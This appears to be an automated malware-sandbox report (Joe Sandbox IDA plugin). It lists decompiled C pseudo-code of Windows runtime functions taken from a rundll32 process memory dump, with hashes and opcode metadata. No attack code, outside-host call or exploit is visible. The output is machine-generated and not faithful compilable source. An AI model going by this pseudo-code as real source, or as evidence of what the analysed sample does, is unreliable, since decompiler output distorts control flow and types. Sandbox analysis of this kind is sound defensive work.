                                                                                            				void* _t42;
                                                                                            				intOrPtr _t47;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_t36 =  &_v8;
                                                                                            				if(E0460F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                                                                            					L10:
                                                                                            					_t22 = 0;
                                                                                            				} else {
                                                                                            					_t24 = _v8 + __ecx;
                                                                                            					_t42 = _t24;
                                                                                            					if(_t24 < __ecx) {
                                                                                            						goto L10;
                                                                                            					} else {
                                                                                            						if(E0460F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                                                                            							goto L10;
                                                                                            						} else {
                                                                                            							_t29 = _v8 + _t42;
                                                                                            							if(_t29 < _t42) {
                                                                                            								goto L10;
                                                                                            							} else {
                                                                                            								_t47 = _t29;
                                                                                            								_t30 = _a16;
                                                                                            								if(_t30 != 0) {
                                                                                            									 *_t30 = _t47;
                                                                                            								}
                                                                                            								if(_t47 == 0) {
                                                                                            									goto L10;
                                                                                            								} else {
                                                                                            									_t22 = L045F4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				return _t22;
                                                                                            			}











                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                            • Instruction ID: 3e16d8d6f8012713c9b9d8f998217163efeb74a657737a068a3b55e2d15f07a0
                                                                                            • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                                                            • Instruction Fuzzy Hash: B1018872700129EFD728BE5FDC41E6B77ADFB88764B144524BA08CB250DA70EE01D7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 46%
                                                                                            			E0466C450(intOrPtr* _a4) {
                                                                                            				signed char _t25;
                                                                                            				intOrPtr* _t26;
                                                                                            				intOrPtr* _t27;
                                                                                            
                                                                                            				_t26 = _a4;
                                                                                            				_t25 =  *(_t26 + 0x10);
                                                                                            				if((_t25 & 0x00000003) != 1) {
                                                                                            					_push(0);
                                                                                            					_push(0);
                                                                                            					_push(0);
                                                                                            					_push( *((intOrPtr*)(_t26 + 8)));
                                                                                            					_push(0);
                                                                                            					_push( *_t26);
                                                                                            					E04619910();
                                                                                            					_t25 =  *(_t26 + 0x10);
                                                                                            				}
                                                                                            				if((_t25 & 0x00000001) != 0) {
                                                                                            					_push(4);
                                                                                            					_t7 = _t26 + 4; // 0x4
                                                                                            					_t27 = _t7;
                                                                                            					_push(_t27);
                                                                                            					_push(5);
                                                                                            					_push(0xfffffffe);
                                                                                            					E046195B0();
                                                                                            					if( *_t27 != 0) {
                                                                                            						_push( *_t27);
                                                                                            						E046195D0();
                                                                                            					}
                                                                                            				}
                                                                                            				_t8 = _t26 + 0x14; // 0x14
                                                                                            				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                                                                            					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                                                                            				}
                                                                                            				_push( *_t26);
                                                                                            				E046195D0();
                                                                                            				return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                                                                            			}







                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                            • Instruction ID: 00609db0f067d6387c94d84de16ec5a5a0dd0306ed9ec08e1370a63751bf9c4d
                                                                                            • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                                                            • Instruction Fuzzy Hash: 8201D2B2140A05BFE721AF25CC80EA2FB7DFF54394F044529F25552670EB22BCA1CAA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 69%
                                                                                            			E045D9080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                            				intOrPtr* _t51;
                                                                                            				intOrPtr _t59;
                                                                                            				signed int _t64;
                                                                                            				signed int _t67;
                                                                                            				signed int* _t71;
                                                                                            				signed int _t74;
                                                                                            				signed int _t77;
                                                                                            				signed int _t82;
                                                                                            				intOrPtr* _t84;
                                                                                            				void* _t85;
                                                                                            				intOrPtr* _t87;
                                                                                            				void* _t94;
                                                                                            				signed int _t95;
                                                                                            				intOrPtr* _t97;
                                                                                            				signed int _t99;
                                                                                            				signed int _t102;
                                                                                            				void* _t104;
                                                                                            
                                                                                            				_push(__ebx);
                                                                                            				_push(__esi);
                                                                                            				_push(__edi);
                                                                                            				_t97 = __ecx;
                                                                                            				_t102 =  *(__ecx + 0x14);
                                                                                            				if((_t102 & 0x02ffffff) == 0x2000000) {
                                                                                            					_t102 = _t102 | 0x000007d0;
                                                                                            				}
                                                                                            				_t48 =  *[fs:0x30];
                                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                                                                            					_t102 = _t102 & 0xff000000;
                                                                                            				}
                                                                                            				_t80 = 0x46c85ec;
                                                                                            				E045F2280(_t48, 0x46c85ec);
                                                                                            				_t51 =  *_t97 + 8;
                                                                                            				if( *_t51 != 0) {
                                                                                            					L6:
                                                                                            					return E045EFFB0(_t80, _t97, _t80);
                                                                                            				} else {
                                                                                            					 *(_t97 + 0x14) = _t102;
                                                                                            					_t84 =  *0x46c538c; // 0x29fb0d8
                                                                                            					if( *_t84 != 0x46c5388) {
                                                                                            						_t85 = 3;
                                                                                            						asm("int 0x29");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						asm("int3");
                                                                                            						_push(0x2c);
                                                                                            						_push(0x46af6e8);
                                                                                            						E0462D0E8(0x46c85ec, _t97, _t102);
                                                                                            						 *((char*)(_t104 - 0x1d)) = 0;
                                                                                            						_t99 =  *(_t104 + 8);
                                                                                            						__eflags = _t99;
                                                                                            						if(_t99 == 0) {
                                                                                            							L13:
                                                                                            							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                                                                            							if(__eflags == 0) {
                                                                                            								E046A88F5(_t80, _t85, 0x46c5388, _t99, _t102, __eflags);
                                                                                            							}
                                                                                            						} else {
                                                                                            							__eflags = _t99 -  *0x46c86c0; // 0x29e07b0
                                                                                            							if(__eflags == 0) {
                                                                                            								goto L13;
                                                                                            							} else {
                                                                                            								__eflags = _t99 -  *0x46c86b8; // 0x0
                                                                                            								if(__eflags == 0) {
                                                                                            									goto L13;
                                                                                            								} else {
                                                                                            									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                                                                            									__eflags =  *((char*)(_t59 + 0x28));
                                                                                            									if( *((char*)(_t59 + 0x28)) == 0) {
                                                                                            										E045F2280(_t99 + 0xe0, _t99 + 0xe0);
                                                                                            										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                                                                            										__eflags =  *((char*)(_t99 + 0xe5));
                                                                                            										if(__eflags != 0) {
                                                                                            											E046A88F5(0x46c85ec, _t85, 0x46c5388, _t99, _t102, __eflags);
                                                                                            										} else {
                                                                                            											__eflags =  *((char*)(_t99 + 0xe4));
                                                                                            											if( *((char*)(_t99 + 0xe4)) == 0) {
                                                                                            												 *((char*)(_t99 + 0xe4)) = 1;
                                                                                            												_push(_t99);
                                                                                            												_push( *((intOrPtr*)(_t99 + 0x24)));
                                                                                            												E0461AFD0();
                                                                                            											}
                                                                                            											while(1) {
                                                                                            												_t71 = _t99 + 8;
                                                                                            												 *(_t104 - 0x2c) = _t71;
                                                                                            												_t80 =  *_t71;
                                                                                            												_t95 = _t71[1];
                                                                                            												 *(_t104 - 0x28) = _t80;
                                                                                            												 *(_t104 - 0x24) = _t95;
                                                                                            												while(1) {
                                                                                            													L19:
                                                                                            													__eflags = _t95;
                                                                                            													if(_t95 == 0) {
                                                                                            														break;
                                                                                            													}
                                                                                            													_t102 = _t80;
                                                                                            													 *(_t104 - 0x30) = _t95;
                                                                                            													 *(_t104 - 0x24) = _t95 - 1;
                                                                                            													asm("lock cmpxchg8b [edi]");
                                                                                            													_t80 = _t102;
                                                                                            													 *(_t104 - 0x28) = _t80;
                                                                                            													 *(_t104 - 0x24) = _t95;
                                                                                            													__eflags = _t80 - _t102;
                                                                                            													_t99 =  *(_t104 + 8);
                                                                                            													if(_t80 != _t102) {
                                                                                            														continue;
                                                                                            													} else {
                                                                                            														__eflags = _t95 -  *(_t104 - 0x30);
                                                                                            														if(_t95 !=  *(_t104 - 0x30)) {
                                                                                            															continue;
                                                                                            														} else {
                                                                                            															__eflags = _t95;
                                                                                            															if(_t95 != 0) {
                                                                                            																_t74 = 0;
                                                                                            																 *(_t104 - 0x34) = 0;
                                                                                            																_t102 = 0;
                                                                                            																__eflags = 0;
                                                                                            																while(1) {
                                                                                            																	 *(_t104 - 0x3c) = _t102;
                                                                                            																	__eflags = _t102 - 3;
                                                                                            																	if(_t102 >= 3) {
                                                                                            																		break;
                                                                                            																	}
                                                                                            																	__eflags = _t74;
                                                                                            																	if(_t74 != 0) {
                                                                                            																		L49:
                                                                                            																		_t102 =  *_t74;
                                                                                            																		__eflags = _t102;
                                                                                            																		if(_t102 != 0) {
                                                                                            																			_t102 =  *(_t102 + 4);
                                                                                            																			__eflags = _t102;
                                                                                            																			if(_t102 != 0) {
                                                                                            																				 *0x46cb1e0(_t74, _t99);
                                                                                            																				 *_t102();
                                                                                            																			}
                                                                                            																		}
                                                                                            																		do {
                                                                                            																			_t71 = _t99 + 8;
                                                                                            																			 *(_t104 - 0x2c) = _t71;
                                                                                            																			_t80 =  *_t71;
                                                                                            																			_t95 = _t71[1];
                                                                                            																			 *(_t104 - 0x28) = _t80;
                                                                                            																			 *(_t104 - 0x24) = _t95;
                                                                                            																			goto L19;
                                                                                            																		} while (_t74 == 0);
                                                                                            																		goto L49;
                                                                                            																	} else {
                                                                                            																		_t82 = 0;
                                                                                            																		__eflags = 0;
                                                                                            																		while(1) {
                                                                                            																			 *(_t104 - 0x38) = _t82;
                                                                                            																			__eflags = _t82 -  *0x46c84c0;
                                                                                            																			if(_t82 >=  *0x46c84c0) {
                                                                                            																				break;
                                                                                            																			}
                                                                                            																			__eflags = _t74;
                                                                                            																			if(_t74 == 0) {
                                                                                            																				_t77 = E046A9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                                                                            																				__eflags = _t77;
                                                                                            																				if(_t77 == 0) {
                                                                                            																					_t74 = 0;
                                                                                            																					__eflags = 0;
                                                                                            																				} else {
                                                                                            																					_t74 = _t77 + 0xfffffff4;
                                                                                            																				}
                                                                                            																				 *(_t104 - 0x34) = _t74;
                                                                                            																				_t82 = _t82 + 1;
                                                                                            																				continue;
                                                                                            																			}
                                                                                            																			break;
                                                                                            																		}
                                                                                            																		_t102 = _t102 + 1;
                                                                                            																		continue;
                                                                                            																	}
                                                                                            																	goto L20;
                                                                                            																}
                                                                                            																__eflags = _t74;
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            													break;
                                                                                            												}
                                                                                            												L20:
                                                                                            												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                                                                            												 *((char*)(_t99 + 0xe5)) = 1;
                                                                                            												 *((char*)(_t104 - 0x1d)) = 1;
                                                                                            												goto L21;
                                                                                            											}
                                                                                            										}
                                                                                            										L21:
                                                                                            										 *(_t104 - 4) = 0xfffffffe;
                                                                                            										E045D922A(_t99);
                                                                                            										_t64 = E045F7D50();
                                                                                            										__eflags = _t64;
                                                                                            										if(_t64 != 0) {
                                                                                            											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                                            										} else {
                                                                                            											_t67 = 0x7ffe0386;
                                                                                            										}
                                                                                            										__eflags =  *_t67;
                                                                                            										if( *_t67 != 0) {
                                                                                            											_t67 = E046A8B58(_t99);
                                                                                            										}
                                                                                            										__eflags =  *((char*)(_t104 - 0x1d));
                                                                                            										if( *((char*)(_t104 - 0x1d)) != 0) {
                                                                                            											__eflags = _t99 -  *0x46c86c0; // 0x29e07b0
                                                                                            											if(__eflags != 0) {
                                                                                            												__eflags = _t99 -  *0x46c86b8; // 0x0
                                                                                            												if(__eflags == 0) {
                                                                                            													_t94 = 0x46c86bc;
                                                                                            													_t87 = 0x46c86b8;
                                                                                            													goto L27;
                                                                                            												} else {
                                                                                            													__eflags = _t67 | 0xffffffff;
                                                                                            													asm("lock xadd [edi], eax");
                                                                                            													if(__eflags == 0) {
                                                                                            														E045D9240(_t80, _t99, _t99, _t102, __eflags);
                                                                                            													}
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t94 = 0x46c86c4;
                                                                                            												_t87 = 0x46c86c0;
                                                                                            												L27:
                                                                                            												E04609B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                                                                            											}
                                                                                            										}
                                                                                            									} else {
                                                                                            										goto L13;
                                                                                            									}
                                                                                            								}
                                                                                            							}
                                                                                            						}
                                                                                            						return E0462D130(_t80, _t99, _t102);
                                                                                            					} else {
                                                                                            						 *_t51 = 0x46c5388;
                                                                                            						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                                                                            						 *_t84 = _t51;
                                                                                            						 *0x46c538c = _t51;
                                                                                            						goto L6;
                                                                                            					}
                                                                                            				}
                                                                                            			}




















                                                                                            0x0463378b
                                                                                            0x0463378b
                                                                                            0x04633792
                                                                                            0x04633795
                                                                                            0x00000000
                                                                                            0x04633795
                                                                                            0x00000000
                                                                                            0x04633779
                                                                                            0x04633798
                                                                                            0x00000000
                                                                                            0x04633798
                                                                                            0x00000000
                                                                                            0x04633768
                                                                                            0x0463379b
                                                                                            0x0463379b
                                                                                            0x04633751
                                                                                            0x04633749
                                                                                            0x00000000
                                                                                            0x04633740
                                                                                            0x045d91a0
                                                                                            0x045d91a3
                                                                                            0x045d91a9
                                                                                            0x045d91b0
                                                                                            0x00000000
                                                                                            0x045d91b0
                                                                                            0x045d9187
                                                                                            0x045d91b4
                                                                                            0x045d91b4
                                                                                            0x045d91bb
                                                                                            0x045d91c0
                                                                                            0x045d91c5
                                                                                            0x045d91c7
                                                                                            0x046337da
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91cd
                                                                                            0x045d91d2
                                                                                            0x045d91d5
                                                                                            0x045d9239
                                                                                            0x045d9239
                                                                                            0x045d91d7
                                                                                            0x045d91db
                                                                                            0x045d91e1
                                                                                            0x045d91e7
                                                                                            0x045d91fd
                                                                                            0x045d9203
                                                                                            0x045d921e
                                                                                            0x045d9223
                                                                                            0x00000000
                                                                                            0x045d9205
                                                                                            0x045d9205
                                                                                            0x045d9208
                                                                                            0x045d920c
                                                                                            0x045d9214
                                                                                            0x045d9214
                                                                                            0x045d920c
                                                                                            0x045d91e9
                                                                                            0x045d91e9
                                                                                            0x045d91ee
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91f3
                                                                                            0x045d91e7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045d9134
                                                                                            0x045d9125
                                                                                            0x045d911d
                                                                                            0x045d914e
                                                                                            0x045d90d1
                                                                                            0x045d90d1
                                                                                            0x045d90d3
                                                                                            0x045d90d6
                                                                                            0x045d90d8
                                                                                            0x00000000
                                                                                            0x045d90d8
                                                                                            0x045d90cf

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e3ac47e56b90072c3ec4b1b52bf54d9e55b5cea87ff34c6728fc6f34643e0e7d
                                                                                            • Instruction ID: b8ed4bb670b906869acff1e4c191becd0fe78839cb7b5adf98cc56dcdd7be443
                                                                                            • Opcode Fuzzy Hash: e3ac47e56b90072c3ec4b1b52bf54d9e55b5cea87ff34c6728fc6f34643e0e7d
                                                                                            • Instruction Fuzzy Hash: 8801D1B26012109FE3249F08EC40B2277A9FF85324F25406BE505DB691E274FC41DBD1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 86%
                                                                                            			E046A4015(signed int __eax, signed int __ecx) {
                                                                                            				void* __ebx;
                                                                                            				void* __edi;
                                                                                            				signed char _t10;
                                                                                            				signed int _t28;
                                                                                            
                                                                                            				_push(__ecx);
                                                                                            				_t28 = __ecx;
                                                                                            				asm("lock xadd [edi+0x24], eax");
                                                                                            				_t10 = (__eax | 0xffffffff) - 1;
                                                                                            				if(_t10 == 0) {
                                                                                            					_t1 = _t28 + 0x1c; // 0x1e
                                                                                            					E045F2280(_t10, _t1);
                                                                                            					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                            					E045F2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x46c86ac);
                                                                                            					E045DF900(0x46c86d4, _t28);
                                                                                            					E045EFFB0(0x46c86ac, _t28, 0x46c86ac);
                                                                                            					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                                                                            					E045EFFB0(0, _t28, _t1);
                                                                                            					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                                                                            					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                                                                            						L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                                                                            					}
                                                                                            					_t10 = L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                                                            				}
                                                                                            				return _t10;
                                                                                            			}








                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7389937e966f1870363e03f8c64a87389b40c48fe511c94ad2d9930b7f64c6f3
                                                                                            • Instruction ID: 9e10ef0bc8052cc2db35191a5d525b3bb7fcbfde46250433393f72e4af852078
                                                                                            • Opcode Fuzzy Hash: 7389937e966f1870363e03f8c64a87389b40c48fe511c94ad2d9930b7f64c6f3
                                                                                            • Instruction Fuzzy Hash: 960184722019467FE221AF79CD80E67B7ACFF89658B000629F61883A51DB24FC11DAE4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 61%
                                                                                            			E046914FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				short _v54;
                                                                                            				char _v60;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed char* _t21;
                                                                                            				intOrPtr _t27;
                                                                                            				intOrPtr _t33;
                                                                                            				intOrPtr _t34;
                                                                                            				signed int _t35;
                                                                                            
                                                                                            				_t32 = __edx;
                                                                                            				_t27 = __ebx;
                                                                                            				_v8 =  *0x46cd360 ^ _t35;
                                                                                            				_t33 = __edx;
                                                                                            				_t34 = __ecx;
                                                                                            				E0461FA60( &_v60, 0, 0x30);
                                                                                            				_v20 = _a4;
                                                                                            				_v16 = _a8;
                                                                                            				_v28 = _t34;
                                                                                            				_v24 = _t33;
                                                                                            				_v54 = 0x1034;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t21 = 0x7ffe0388;
                                                                                            				} else {
                                                                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                            				}
                                                                                            				_push( &_v60);
                                                                                            				_push(0x10);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t21 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                            			}


















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: caf4c2ea35bc221bf83ef061aef9e663ccd355236518f38c408591226681a96a
                                                                                            • Instruction ID: 38a4fbfdd36b000c45e92f61a1b50907f0a981aa54c5198bb52afc9feec462c7
                                                                                            • Opcode Fuzzy Hash: caf4c2ea35bc221bf83ef061aef9e663ccd355236518f38c408591226681a96a
                                                                                            • Instruction Fuzzy Hash: 1801B571A00248AFDB04DF69D841EAEB7B8EF45710F44406AF914EB390E674EE01CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 61%
                                                                                            			E0469138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                            				signed int _v8;
                                                                                            				intOrPtr _v16;
                                                                                            				intOrPtr _v20;
                                                                                            				intOrPtr _v24;
                                                                                            				intOrPtr _v28;
                                                                                            				short _v54;
                                                                                            				char _v60;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				signed char* _t21;
                                                                                            				intOrPtr _t27;
                                                                                            				intOrPtr _t33;
                                                                                            				intOrPtr _t34;
                                                                                            				signed int _t35;
                                                                                            
                                                                                            				_t32 = __edx;
                                                                                            				_t27 = __ebx;
                                                                                            				_v8 =  *0x46cd360 ^ _t35;
                                                                                            				_t33 = __edx;
                                                                                            				_t34 = __ecx;
                                                                                            				E0461FA60( &_v60, 0, 0x30);
                                                                                            				_v20 = _a4;
                                                                                            				_v16 = _a8;
                                                                                            				_v28 = _t34;
                                                                                            				_v24 = _t33;
                                                                                            				_v54 = 0x1033;
                                                                                            				if(E045F7D50() == 0) {
                                                                                            					_t21 = 0x7ffe0388;
                                                                                            				} else {
                                                                                            					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                                            				}
                                                                                            				_push( &_v60);
                                                                                            				_push(0x10);
                                                                                            				_push(0x20402);
                                                                                            				_push( *_t21 & 0x000000ff);
                                                                                            				return E0461B640(E04619AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                            			}


















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: f4a35426ff8a70305019cc35305707a12b6e098f10752a8e00a22548e926ca84
                                                                                            • Instruction ID: a4ed366dfdbdd942716963b6512a2a38933c436b967d86e35171c9be13cfd6a0
                                                                                            • Opcode Fuzzy Hash: f4a35426ff8a70305019cc35305707a12b6e098f10752a8e00a22548e926ca84
                                                                                            • Instruction Fuzzy Hash: 7A019271A00208AFDB04DFA9D841EAEB7B8EF45710F44406AB904EB380E674AE01C794
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 91%
                                                                                            			E045D58EC(intOrPtr __ecx) {
                                                                                            				signed int _v8;
                                                                                            				char _v28;
                                                                                            				char _v44;
                                                                                            				char _v76;
                                                                                            				void* __edi;
                                                                                            				void* __esi;
                                                                                            				intOrPtr _t10;
                                                                                            				intOrPtr _t16;
                                                                                            				intOrPtr _t17;
                                                                                            				intOrPtr _t27;
                                                                                            				intOrPtr _t28;
                                                                                            				signed int _t29;
                                                                                            
                                                                                            				_v8 =  *0x46cd360 ^ _t29;
                                                                                            				_t10 =  *[fs:0x30];
                                                                                            				_t27 = __ecx;
                                                                                            				if(_t10 == 0) {
                                                                                            					L6:
                                                                                            					_t28 = 0x45b5c80;
                                                                                            				} else {
                                                                                            					_t16 =  *((intOrPtr*)(_t10 + 0x10));
                                                                                            					if(_t16 == 0) {
                                                                                            						goto L6;
                                                                                            					} else {
                                                                                            						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
                                                                                            					}
                                                                                            				}
                                                                                            				if(E045D5943() != 0 &&  *0x46c5320 > 5) {
                                                                                            					E04657B5E( &_v44, _t27);
                                                                                            					_t22 =  &_v28;
                                                                                            					E04657B5E( &_v28, _t28);
                                                                                            					_t11 = E04657B9C(0x46c5320, 0x45bbf15,  &_v28, _t22, 4,  &_v76);
                                                                                            				}
                                                                                            				return E0461B640(_t11, _t17, _v8 ^ _t29, 0x45bbf15, _t27, _t28);
                                                                                            			}
















                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7c20b4c65f7a9a7540ccd739094cb544fb94f1594e9898a88a84fbb14169c541
                                                                                            • Instruction ID: ef236d24559ce655714f35245dc0eae9a0589770e364294d14357c215e68cf87
                                                                                            • Opcode Fuzzy Hash: 7c20b4c65f7a9a7540ccd739094cb544fb94f1594e9898a88a84fbb14169c541
                                                                                            • Instruction Fuzzy Hash: C9018F31B00118ABE724EF29EC049BE77A8FF84624F9400699905A7258FE30FD02D6D4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 100%
                                                                                            			E046A1074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
                                                                                            				char _v8;
                                                                                            				void* _v11;
                                                                                            				unsigned int _v12;
                                                                                            				void* _v15;
                                                                                            				void* __esi;
                                                                                            				void* __ebp;
                                                                                            				char* _t16;
                                                                                            				signed int* _t35;
                                                                                            
                                                                                            				_t22 = __ebx;
                                                                                            				_t35 = __ecx;
                                                                                            				_v8 = __edx;
                                                                                            				_t13 =  !( *__ecx) + 1;
                                                                                            				_v12 =  !( *__ecx) + 1;
                                                                                            				if(_a4 != 0) {
                                                                                            					E046A165E(__ebx, 0x46c8ae4, (__edx -  *0x46c8b04 >> 0x14) + (__edx -  *0x46c8b04 >> 0x14), __edi, __ecx, (__edx -  *0x46c8b04 >> 0x14) + (__edx -  *0x46c8b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
                                                                                            				}
